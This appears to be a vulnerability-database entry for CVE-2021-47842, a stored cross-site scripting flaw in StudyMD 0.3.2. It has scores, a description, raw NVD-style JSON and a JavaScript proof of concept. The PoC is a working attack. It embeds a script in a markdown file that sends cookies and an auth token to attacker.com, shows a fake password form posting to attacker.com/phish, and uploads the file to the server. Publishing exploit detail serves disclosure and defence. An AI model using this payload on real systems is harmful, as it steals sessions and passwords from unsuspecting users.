Security Vulnerability Report
CVE-2021-47842 CVSS 7.2 HIGH

Published: 2026-01-16 19:16:10
Last Modified: 2026-04-15 00:35:42

Description

StudyMD 0.3.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

StudyMD < 0.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2021-47842 PoC - StudyMD Persistent XSS
// Create a malicious markdown file with embedded JavaScript payload
const maliciousMarkdown = `
# Medical Notes - Confidential

This document contains important study materials.

<script>
// Steal session cookies and send to attacker server
const stolenData = {
  cookies: document.cookie,
  localStorage: localStorage.getItem('authToken'),
  userAgent: navigator.userAgent,
  timestamp: new Date().toISOString()
};

// Send stolen data to attacker-controlled endpoint
fetch('https://attacker.com/collect?data=' + btoa(JSON.stringify(stolenData)));

// Alternative payload: Session Hijacking
document.body.innerHTML = '<h1>Session Expired</h1><form action="https://attacker.com/phish">Enter Password: <input type="password" name="pwd"><button>Submit</button></form>';
</script>

## Key Concepts
- Pharmacology interactions
- Pathophysiology review
- Clinical case studies
`;

// Upload the malicious file via StudyMD upload endpoint
async function exploit() {
  const formData = new FormData();
  const blob = new Blob([maliciousMarkdown], { type: 'text/markdown' });
  formData.append('file', blob, 'medical_notes.md');

  // Upload to vulnerable endpoint
  await fetch('https://vulnerable-server/api/upload', {
    method: 'POST',
    body: formData,
    credentials: 'include'
  });

  console.log('Malicious markdown uploaded. Users viewing this file will be compromised.');
}

exploit();

// Note: This PoC demonstrates the vulnerability for authorized security testing only.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47842", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.020", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "StudyMD 0.3.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution."}, {"lang": "es", "value": "StudyMD 0.3.2 contiene una vulnerabilidad de cross-site scripting persistente que permite a los atacantes inyectar scripts maliciosos en archivos markdown. Los atacantes pueden subir archivos markdown manipulados con cargas útiles de JavaScript incrustadas que se ejecutan cuando se abre el archivo, lo que podría permitir la ejecución remota de código."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/jotron/StudyMD", "source": "[email protected]"}, {"url": "https://imgur.com/a/lDHKEIp", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49832", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/studymd-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/studymd-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}